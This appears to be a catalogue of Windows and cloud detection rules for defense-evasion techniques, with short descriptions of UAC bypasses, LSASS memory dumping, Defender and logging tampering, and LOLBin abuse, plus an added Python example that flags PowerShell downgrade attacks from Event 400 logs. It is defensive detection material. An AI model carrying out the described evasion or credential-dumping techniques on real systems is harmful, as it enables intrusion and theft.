attack.defense_evasion

Explorer NOUACCHECK Flag
level
status test

Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag, which allows all sub-processes of that newly started explorer.exe to run without any UAC checks

Wlrmdr Lolbin Use as Launcher
level
status experimental

Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute

Registry Defender Exclusions
level
status experimental

Qbot used reg.exe to add Defender folder exceptions for folders within AppData and ProgramData.

Process Access via TrolleyExpress Exclusion
level
status experimental

Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory

Suspicious Recursive Takeown
level
status experimental

Adversaries can interact with DACLs using the built-in Windows command takeown, which can grant adversaries higher permissions on specific files and folders

Blackbyte Ransomware Registry
level
status experimental

BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption

Suspicious Execution of InstallUtil Without Log
level
status experimental

Uses the .NET InstallUtil.exe application to execute an image without logging

Disable System Firewall
level
status experimental

Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.

Suspicious Creation with Colorcpl
level
status experimental

Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\

Suspicious Msiexec Quiet Install
level
status experimental

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)

Suspicious Msiexec Execute Arbitrary DLL
level
status experimental

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)

Msiexec Initiated Connection
level
status experimental

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)

Dism Remove Online Package
level
status experimental

Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images

Disable Administrative Share Creation at Startup
level
status experimental

Administrative shares are hidden network shares created by Microsoft's Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system

Delete Log from Application
level
status experimental

Deletion of log files is a known anti-forensic technique

Use Remove-Item to Delete File
level
status experimental

Detects PowerShell Remove-Item with -Path used to delete a file or a folder with "-Recurse"

Suspicious Unblock-File
level
status experimental

Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.

Suspicious Start-Process PassThru
level
status experimental

Detects PowerShell using the PassThru option to start a process in the background

Obfuscated Command Line Using Special Unicode Characters
level
status experimental

Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.

Rundll32 JS RunHTMLApplication Pattern
level
status experimental

Detects suspicious command line patterns used when rundll32 is used to run JavaScript code

Uninstall Sysinternals Sysmon
level
status experimental

Detects the uninstallation of Sysinternals Sysmon, which could be the result of legitimate administration or a manipulation for defense evasion

Sysmon Configuration Change
level
status experimental

Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying to manipulate the configuration

Suspicious Regsvr32 HTTP IP Pattern
level
status experimental

Detects a certain command line flag combination used by regsvr32 to download and register a DLL from a remote address that uses HTTP (not HTTPS) and an IP address rather than an FQDN

NodejsTools PressAnyKey Lolbin
level
status experimental

Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary

DevInit Lolbin Download
level
status experimental

Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system

Procdump Evasion
level
status experimental

Detects uses of the SysInternals Procdump utility in which procdump or its output gets renamed, or a dump file is moved or copied to a different name

Abuse of Service Permissions to Hide Services in Tools
level
status experimental

Detects the sc.exe utility adding a new service with special permissions that hide that service.

False Sysinternals Suite Tools
level
status experimental

Detects a binary renamed as a legitimate Sysinternals Suite tool to evade detection

Suspicious NT Resource Kit Auditpol Usage
level
status experimental

Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.

CleanWipe Usage
level
status experimental

Detects the use of CleanWipe, a tool usually used to remove Symantec antivirus.

Suspicious Regsvr32 Execution With Image Extension
level
status experimental

Utilizes REGSVR32.exe to execute a DLL masquerading as an image file

Suspicious Extrac32 Alternate Data Stream Execution
level
status experimental

Extracts data from a cab file and hides it in an alternate data stream

Suspicious Extexport Execution
level
status experimental

Extexport.exe loads a DLL and is executed from a folder other than its original path

Suspicious Diantz Alternate Data Stream Execution
level
status experimental

Compresses the target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.

Clearing Windows Console History
level
status experimental

Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.

Suspicious Subsystem for Linux Bash Execution
level
status experimental

Performs execution of a specified file, which can be used for defense evasion.

Suspicious aspnet_compiler.exe Execution
level
status experimental

Executes C# code with the Build Provider and the proper folder structure in place.

Shell32 DLL Execution in Suspicious Directory
level
status experimental

Detects shell32.dll executing a DLL in a suspicious directory

Space After Filename - macOS
level
status experimental

Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.

New File Association Using Exefile
level
status experimental

Detects the abuse of the exefile handler in new file association. Used for bypass of security products.

Command Line Path Traversal Evasion
level
status experimental

Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal

Suspicious Del in CommandLine
level
status experimental

Detects a suspicious command line used to remove an exe or dll

Suspicious Load DLL via CertOC.exe
level
status experimental

Detects when a user installs certificates by using CertOC.exe to load the target DLL file.

Execution via stordiag.exe
level
status experimental

Detects the use of stordiag.exe to execute schtasks.exe, systeminfo.exe and fltmc.exe

Execution via WorkFolders.exe
level
status experimental

Detects using WorkFolders.exe to execute an arbitrary control.exe

Suspicious PowerShell WindowStyle Option
level
status experimental

Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden

NetWire RAT Registry Key
level
status experimental

Attempts to detect registry events for common NetWire key HKCU\Software\NetWire

Terminal Server Client Connection History Cleared
level
status experimental

Detects the deletion of registry keys containing the MSTSC connection history

Windows Defender Real-Time Protection Disabled
level
status experimental

Detects disabling Windows Defender Real-Time Protection by modifying registry

Windows Firewall Profile Disabled
level
status experimental

Detects when a user disables the Windows Firewall via a Profile to help evade defense.

Prefetch File Deletion
level
status experimental

Detects the deletion of a prefetch file (AntiForensic)

Xwizard DLL Sideloading
level
status experimental

Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll

Chafer Activity
level
status experimental

Detects Chafer activity attributed to OilRig as reported in the Nyotron report in March 2018

Steganography Hide Files with Steghide
level
status experimental

Detects embedding of files using the steghide binary; adversaries may use this technique to prevent the detection of hidden information.

Steganography Extract Files with Steghide
level
status experimental

Detects extraction of files using the steghide binary; adversaries may use this technique to prevent the detection of hidden information.

UAC Bypass Using ComputerDefaults
level
status experimental

Detects the pattern of UAC Bypass using computerdefaults.exe (UACMe 59)

DNS-over-HTTPS Enabled by Registry
level
status experimental

Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or to hide the process of exfiltrating data. With this enabled, an organization loses visibility into data such as query type, response and originating IP that are used to identify bad actors.

Remove Exported Mailbox from Exchange Webserver
level
status experimental

Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit

UAC Bypass WSReset
level
status experimental

Detects the pattern of UAC Bypass via WSReset, usable with the default sysmon-config

UAC Bypass Using WOW64 Logger DLL Hijack
level
status experimental

Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)

UAC Bypass Using Windows Media Player - Registry
level
status experimental

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

UAC Bypass Using Windows Media Player - Process
level
status experimental

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

UAC Bypass Using Windows Media Player - File
level
status experimental

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

UAC Bypass Using PkgMgr and DISM
level
status experimental

Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)

UAC Bypass Using NTFS Reparse Point - Process
level
status experimental

Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)

UAC Bypass Using NTFS Reparse Point - File
level
status experimental

Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)

UAC Bypass Using MSConfig Token Modification - Process
level
status experimental

Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)

UAC Bypass Using MSConfig Token Modification - File
level
status experimental

Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)

UAC Bypass Using IEInstal - Process
level
status experimental

Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)

UAC Bypass Using IEInstal - File
level
status experimental

Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)

UAC Bypass Using DismHost
level
status experimental

Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)

UAC Bypass Using Disk Cleanup
level
status experimental

Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)

UAC Bypass Using Consent and Comctl32 - Process
level
status experimental

Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)

UAC Bypass Using Consent and Comctl32 - File
level
status experimental

Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)

UAC Bypass Using ChangePK and SLUI
level
status experimental

Detects a UAC bypass that uses changepk.exe and slui.exe (UACMe 61)

UAC Bypass Using .NET Code Profiler on MMC
level
status experimental

Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)

UAC Bypass Abusing Winsat Path Parsing - Registry
level
status experimental

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

UAC Bypass Abusing Winsat Path Parsing - Process
level
status experimental

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

UAC Bypass Abusing Winsat Path Parsing - File
level
status experimental

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

Shell Open Registry Keys Manipulation
level
status experimental

Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)

Created Files by Office Applications
level
status experimental

This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.

New Lolbin Process by Office Applications
level
status experimental

This rule will monitor any office apps that spin up a new LOLBin process. This activity is pretty suspicious and should be investigated.

Lolbins Process Creation with WmiPrvse
level
status experimental

This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed.

EDR WMI Command Execution by Office Applications
level
status experimental

Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32

TrustedPath UAC Bypass Pattern
level
status test

Detects indicators of a UAC bypass method by mocking directories

Azure Active Directory Hybrid Health AD FS Service Delete
level
status experimental

This detection uses AzureActivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. The health AD FS service can then be deleted once it is no longer needed via HTTP requests to Azure.

Azure Active Directory Hybrid Health AD FS New Server
level
status experimental

This detection uses AzureActivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. This can be done programmatically via HTTP requests to Azure.

Suspicious Splwow64 Without Params
level
status experimental

Detects suspicious Splwow64.exe process without any command line parameters

EfsPotato Named Pipe
level
status experimental

Detects the pattern of a pipe name as used by the tool EfsPotato

Powerup Write Hijack DLL
level
status experimental

PowerUp tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In its default mode, it builds a self-deleting .bat file which executes a malicious command. The detection rule relies on the creation of the malicious bat file (debug.bat by default).

Procdump Usage
level
status experimental

Detects uses of the SysInternals Procdump utility

Google Cloud Firewall Modified or Deleted
level
status experimental

Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).

WinDivert Driver Load
level
status experimental

Detects the load of the WinDivert driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows

AWS Macie Evasion
level
status experimental

Detects attempts to evade Macie detection.

Azure Kubernetes Events Deleted
level
status experimental

Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.

Regsvr32 Command Line Without DLL
level
status experimental

Detects a regsvr32.exe execution that doesn't contain a DLL in the command line

SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code
level
status experimental

Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs

Reg Disable Security Service
level
status experimental

Detects a suspicious reg.exe invocation that looks as if it would disable an important security service

Abusable Invoke-ATHRemoteFXvGPUDisablementCommand
level
status experimental

RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).

Windows Defender Exclusions Added
level
status stable

Detects the setting of Windows Defender exclusions

ProtocolHandler.exe Downloaded Suspicious File
level
status experimental

Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.

Mavinject Inject DLL Into Running Process
level
status experimental

Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.

AWS SecurityHub Findings Evasion
level
status stable

Detects the modification of the findings on SecurityHub.

Emotet RunDLL32 Process Creation
level
status experimental

Detects Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL

Conhost Parent Process Executions
level
status experimental

Detects conhost execution as a parent process. Can be used to evade defense mechanisms.

Windows Defender Malware Detection History Deletion
level
status experimental

Windows Defender logs when the history of detected infections is deleted. The log file will contain the message "Windows Defender Antivirus has removed history of malware and other potentially unwanted software".

Winnti Pipemon Characteristics
level
status stable

Detects specific process characteristics of Winnti Pipemon malware reported by ESET

Empire UserAgent URI Combo
level
status test

Detects user agent and URI paths used by Empire agents

Regsvr32 Flags Anomaly
level
status test

Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time

EvilNum Golden Chickens Deployment via OCX Files
level
status test

Detects the Golden Chickens deployment method as used by Evilnum in a report published in July 2020

Explorer Root Flag Process Tree Break
level
status test

Detects a command line process that uses explorer.exe /root, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer

Windows Defender Threat Detection Disabled
level
status stable

Detects disabling Windows Defender threat protection

Disabled IE Security Features
level
status test

Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features

Ke3chang Registry Key Modifications
level
status test

Detects Registry modifications performed by Ke3chang malware in campaigns running in 2019 and 2020

Suspicious New Printer Ports in Registry (CVE-2020-1048)
level
status test

Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048

Notepad Making Network Connection
level
status test

Detects suspicious network connection by Notepad

Process Dump via Rundll32 and Comsvcs.dll
level
status experimental

Detects a process memory dump performed via ordinal function 24 in comsvcs.dll

AWS GuardDuty Important Change
level
status experimental

Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.

Wsreset UAC Bypass
level
status test

Detects a method that uses the Wsreset.exe tool, which resets the Windows Store, to bypass UAC

FromBase64String Command Line
level
status test

Detects suspicious FromBase64String expressions in command line arguments

ZOHO Dctask64 Process Injection
level
status test

Detects suspicious process injection using ZOHO's dctask64.exe

Renamed ZOHO Dctask64
level
status test

Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation

AWS CloudTrail Important Change
level
status experimental

Detects disabling, deleting and updating of a Trail

Audit CVE Event
level
status experimental

Detects events generated by Windows to indicate the exploitation of a known vulnerability (e.g. CVE-2020-0601)

Tasks Folder Evasion
level
status experimental

The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr

Operation Wocao Activity
level
status experimental

Detects activity mentioned in the Operation Wocao report

Renamed ProcDump
level
status experimental

Detects the execution of a renamed ProcDump executable often used by attackers or malware

Cisco File Deletion
level
status test

Detects files being deleted from flash file systems

Cisco Disabling Logging
level
status test

Detects logging being turned off locally or remotely

Cisco Crypto Commands
level
status test

Detects when private keys are being exported from the device, or when new certificates are installed

Cisco Clear Logs
level
status test

Detects clearing of the command history in a network OS, which is used for defense evasion

Suspicious MsiExec Directory
level
status test

Detects suspicious msiexec process starts in an uncommon directory

Masquerading as Linux Crond Process
level
status test

Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.

Suspicious Remote Thread Created
level
status experimental

Offensive tradecraft is switching away from using APIs like "CreateRemoteThread"; however, this is still largely observed in the wild. This rule aims to detect suspicious processes (those we would not expect to behave in this way, like word.exe or outlook.exe) creating remote threads on other processes. It is a generic rule, but it should have a low FP ratio due to the selected range of processes.

New or Renamed User Account with '$' in Attribute 'SamAccountName'
level
status experimental

Detects a possible EDR and SIEM bypass via an abnormal user account name.

Svchost DLL Search Order Hijack
level
status test

Detects DLL search order hijacking of the IKEEXT and SessionEnv services, which call LoadLibrary on files that do not exist within C:\Windows\System32\ by default. An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services ("svchost.exe -k netsvcs") to gain code execution on a remote machine.

Suspicious Bitsadmin Job via PowerShell
level
status test

Detects downloads by BITS jobs via PowerShell

Mshta JavaScript Execution
level
status test

Identifies suspicious mshta.exe commands.

Modification of ld.so.preload
level
status test

Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.

Indirect Command Execution
level
status test

Detects indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).

HH.exe Execution
level
status test

Identifies usage of hh.exe executing recently modified .chm files.

Bypass UAC via CMSTP
level
status test

Detects child processes of automatically elevated instances of Microsoft Connection Manager Profile Installer (cmstp.exe).

Possible Privilege Escalation via Weak Service Permissions
level
status test

Detects the sc.exe utility being spawned by a user with Medium integrity level to change a service's ImagePath or FailureCommand

Application Whitelisting Bypass via Dnx.exe
level
status test

Executes C# code located in the consoleapp folder

Possible App Whitelisting Bypass via WinDbg/CDB as a Shellcode Runner
level
status test

Launches 64-bit shellcode from a debugger script file using cdb.exe.

Windows Defender Exclusion Set
level
status test

Detects scenarios where a Windows Defender exclusion was added in the registry, where an entity would want to bypass antivirus scanning by Windows Defender

Application Whitelisting Bypass via Bginfo
level
status test

Executes VBScript code that is referenced within the *.bgi file.

Application Whitelisting Bypass via DLL Loaded by odbcconf.exe
level
status test

Detects defence evasion attempt via odbcconf.exe execution to load DLL

Regsvr32 Network Activity
level
status experimental

Detects network connections and DNS queries initiated by Regsvr32.exe

Logging Configuration Changes on Linux Host
level
status test

Detects changes to syslog daemon configuration files

Auditing Configuration Changes on Linux Host
level
status test

Detects changes in auditd configuration files

RDP Registry Modification
level
status test

Detects potential malicious modification of the property value of fDenyTSConnections and UserAuthentication to enable remote desktop connections.

CreateRemoteThread API and LoadLibrary
level
status test

Detects potential use of the CreateRemoteThread API and LoadLibrary function to inject a DLL into a process

AD Object WriteDAC Access
level
status test

Detects WRITE_DAC access to a domain object

Remove Immutable File Attribute
level
status test

Detects removal of the immutable file attribute.

File or Folder Permissions Modifications
level
status test

Detects a file or folder's permissions being modified.

File or Folder Permissions Change
level
status test

Detects file and folder permission changes.

Sysmon Driver Unload
level
status experimental

Detects a possible Sysmon driver unload

Devtoolslauncher.exe Executes Specified Binary
level
status test

Devtoolslauncher.exe executes another binary

Suspicious Call by Ordinal
level
status stable

Detects suspicious rundll32 calls of DLL exports by ordinal

Suspicious Code Page Switch
level
status test

Detects a code page switch in command line or batch scripts to a rare language

Emotet Process Creation
level
status test

Detects all Emotet like process executions that are not covered by the more generic rules

Control Panel Items
level
status test

Detects the malicious use of a control panel item

Renamed PowerShell
level
status test

Detects the execution of a renamed PowerShell often used by attackers or malware

Suspicious Userinit Child Process
level
status experimental

Detects a suspicious child process of userinit

Renamed Binary
level
status test

Detects the execution of a renamed binary often used by attackers or malware, leveraging the new Sysmon OriginalFileName datapoint.

Highly Relevant Renamed Binary
level
status test

Detects the execution of a renamed binary often used by attackers or malware, leveraging the new Sysmon OriginalFileName datapoint.

Renamed PsExec
level
status test

Detects the execution of a renamed PsExec often used by attackers or malware

OceanLotus Registry Activity
level
status experimental

Detects registry keys created in OceanLotus (also known as APT32) attacks

Clear Command History
level
status experimental

Detects clearing of the command history in Linux, which is used for defense evasion.

Disable of ETW Trace
level
status test

Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.

MSHTA Suspicious Execution 01
level
status test

Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism

Baby Shark Activity
level
status test

Detects activity that could be related to Baby Shark malware

RDP over Reverse SSH Tunnel WFP
level
status experimental

Detects svchost hosting RDP termsvcs communicating with the loopback address

Windows Shell Spawning Suspicious Program
level
status test

Detects a suspicious child process of a Windows shell

Taskmgr as Parent
level
status test

Detects the creation of a process from Windows task manager

Suspicious Use of Procdump on LSASS
level
status stable

Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.

Suspicious Use of Procdump
level
status experimental

Detects suspicious uses of the SysInternals Procdump utility by using the special command line parameters '-ma' and '-accepteula' in a single step. This way we're also able to catch cases in which the attacker has renamed the procdump executable.

Suspicious Svchost Process
level
status experimental

Detects a suspicious svchost process start

Suspicious RASdial Activity
level
status test

Detects suspicious process related to rasdial.exe

Suspicious Control Panel DLL Load
level
status test

Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits

Suspicious Commandline Escape
level
status test

Detects suspicious processes that use escape characters

Suspicious Certutil Command
level
status experimental

Detects a suspicious Microsoft certutil execution with sub commands like 'decode', which is sometimes used to decode malicious code with the built-in certutil utility

Regsvr32 Anomaly
level
status experimental

Detects various anomalies in relation to regsvr32.exe

Powershell AMSI Bypass via .NET Reflection
level
status test

Detects Request to amsiInitFailed that can be used to disable AMSI Scanning

Possible Applocker Bypass
level
status test

Detects execution of executables that can be used to bypass Applocker whitelisting

Ping Hex IP
level
status test

Detects a ping command that uses a hex encoded IP address

NotPetya Ransomware Activity
level
status test

Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via a named pipe, the file system journal of drive C is deleted, and Windows event logs are cleared using wevtutil

MsiExec Web Install
level
status test

Detects suspicious msiexec process starts with web addresses as parameter

MSHTA Spawned by SVCHOST
level
status test

Detects MSHTA.EXE spawned by SVCHOST as seen in LethalHTA and described in the report

Microsoft Workflow Compiler
level
status experimental

Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.

Hiding Files with Attrib.exe
level
status test

Detects usage of attrib.exe to hide files from users.

File Created with System Process Name
level
status test

Detects the creation of an executable with a system process name in a suspicious folder

Executable Used by PlugX in Uncommon Location
level
status test

Detects the execution of an executable that is typically used by PlugX for DLL side loading started from an uncommon location

Dridex Process Pattern
level
status test

Detects typical Dridex process patterns

Detection of PowerShell Execution via DLL
level
status test

Detects PowerShell Strings applied to rundll as seen in PowerShdll.dll

CMSTP UAC Bypass via COM Object Access
level
status stable

Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)

CobaltStrike Process Injection
level
status experimental

Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons

CobaltStrike Malleable (OCSP) Profile
level
status test

Detects Malleable (OCSP) Profile with Typo (OSCP) in URL

NTFS Alternate Data Stream
level
status experimental

Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.

CMSTP Execution Registry Event
level
status stable

Detects various indicators of Microsoft Connection Manager Profile Installer execution

CMSTP Execution Process Creation
level
status stable

Detects various indicators of Microsoft Connection Manager Profile Installer execution

CMSTP Execution Process Access
level
status stable

Detects various indicators of Microsoft Connection Manager Profile Installer execution

PowerShell Rundll32 Remote Thread Creation
level
status experimental

Detects PowerShell remote thread creation in Rundll32.exe

Taskmgr as LOCAL_SYSTEM
level
status experimental

Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM

Exploit for CVE-2015-1641
level
status stable

Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641

Equation Group DLL_U Load
level
status stable

Detects a specific tool and export used by EquationGroup

Disabling Windows Event Auditing
level
status test

Detects scenarios where system auditing (i.e. Windows event log auditing) is disabled. This may be used by an entity that wants to bypass local logging to evade detection where Windows event logging is enabled and reviewed. It is also recommended to turn off “Local Group Policy Object Processing” via GPO, which ensures that Active Directory GPOs take precedence over local computer policies edited via tools such as “gpedit.msc”. Note that disabling “Local Group Policy Object Processing” may cause issues in scenarios of one-off GPO modifications; however, it is recommended to perform such modifications in Active Directory anyway.

Ps.exe Renamed SysInternals Tool
level
status test

Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report

ZxShell Malware
level
status test

Detects a ZxShell start by the called and well-known function name

Secure Deletion with SDelete
level
status test

Detects the renaming of a file during deletion with the SDelete tool.

DHCP Server Loaded the CallOut DLL
level
status experimental

This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded

DHCP Server Error Failed Loading the CallOut DLL
level
status experimental

This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded

DHCP Callout DLL Installation
level
status test

Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)

PowerShell Downgrade Attack
level
status experimental

Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
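
The comparison described above works on Event ID 400 of the classic “Windows PowerShell” log, whose message lists the host and engine versions as `Name=Value` lines; a 2.0 engine started under a 5.x host means `-version 2` was used to dodge script block logging and AMSI. The following is an added example, not code from the original page or from the Sigma project, that parses such messages and flags the downgrade; it generalises the page's “2.x engine under 5.x host” to any engine older than its host. The sample events are constructed but follow the real Event 400 field layout.

```python
import re
from typing import Dict, List

# Constructed sample records from the classic "Windows PowerShell" event log
# (Event ID 400, "Engine state is changed from None to Available"). They are not
# taken from the original page; field names follow the real Event 400 message.
SAMPLE_EVENTS = [
    {"EventID": 400, "Message": (
        "Engine state is changed from None to Available.\n\nDetails:\n"
        "\tNewEngineState=Available\n\tPreviousEngineState=None\n\n"
        "\tSequenceNumber=13\n\n\tHostName=ConsoleHost\n"
        "\tHostVersion=5.1.19041.1\n"
        "\tHostApplication=powershell.exe -version 2 -nop -w hidden -c ...\n"
        "\tEngineVersion=2.0\n")},
    {"EventID": 400, "Message": (
        "Engine state is changed from None to Available.\n\nDetails:\n"
        "\tNewEngineState=Available\n\tPreviousEngineState=None\n\n"
        "\tSequenceNumber=9\n\n\tHostName=ConsoleHost\n"
        "\tHostVersion=5.1.19041.1\n"
        "\tHostApplication=powershell.exe\n"
        "\tEngineVersion=5.1.19041.1\n")},
    {"EventID": 403, "Message": (  # engine stop: same fields, but not a start
        "Engine state is changed from Available to Stopped.\n\nDetails:\n"
        "\tHostVersion=5.1.19041.1\n\tEngineVersion=2.0\n")},
]

_KV = re.compile(r"^[ \t]*(\w+)=(.*?)[ \t]*$", re.MULTILINE)


def parse_details(message: str) -> Dict[str, str]:
    """Extract the tab-indented Name=Value lines of an Event 400/403 message."""
    return {m.group(1): m.group(2) for m in _KV.finditer(message)}


def _major(version: str) -> int:
    """Major component of a dotted version string, or -1 when it is missing or malformed."""
    try:
        return int(version.split(".")[0])
    except ValueError:
        return -1


def is_downgrade(event: dict) -> bool:
    """Flag an engine start whose engine major version is older than the host's.

    The page's rule compares a 2.x engine with a 5.x host; checking engine < host
    in general also covers a host that already runs a newer engine.
    """
    if event.get("EventID") != 400:
        return False
    d = parse_details(event.get("Message", ""))
    host, engine = _major(d.get("HostVersion", "")), _major(d.get("EngineVersion", ""))
    return host > 0 and engine > 0 and engine < host


def find_downgrades(events: List[dict]) -> List[Dict[str, str]]:
    """Return the parsed details of every downgrade start in the given events."""
    return [parse_details(e["Message"]) for e in events if is_downgrade(e)]
```

Event 400 is written by default, so this check does not depend on script block or module logging being enabled, which is exactly why the downgrade is visible even when the attacker's goal was to avoid those logs. `HostApplication` is kept in the parsed details so the alert can show the offending command line.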

UAC Bypass via Event Viewer
level
status experimental

Detects UAC bypass method using Windows event viewer

UAC Bypass via Sdclt
level
status experimental

Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)

Windows PowerShell User Agent
level
status test

Detects Windows PowerShell Web Access

Account Tampering - Suspicious Failed Logon Reasons
level
status experimental

This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.

Wuauclt Network Connection
level
status test

Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and make network connections. One could easily make the DLL spawn a new process and inject into it to proxy the network connection and bypass this rule.

WSL Execution
level
status test

Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN

Writing Of Malicious Files To The Fonts Folder
level
status experimental

Monitors for possibly malicious files hidden in the C:\Windows\Fonts\ location. Writing to and executing from this folder does not require administrative privileges.

Write Protect For Storage Disabled
level
status experimental

Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.

Wmic Uninstall Security Product
level
status experimental

Detects uninstallation of security products using the WMIC utility

WMIC Loading Scripting Libraries
level
status test

Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the /FORMAT argument switch to download and execute an XSL file (i.e js, vbs, etc).

Winword.exe Loads Suspicious DLL
level
status test

Detects Winword.exe loading a custom DLL via the /l command-line switch
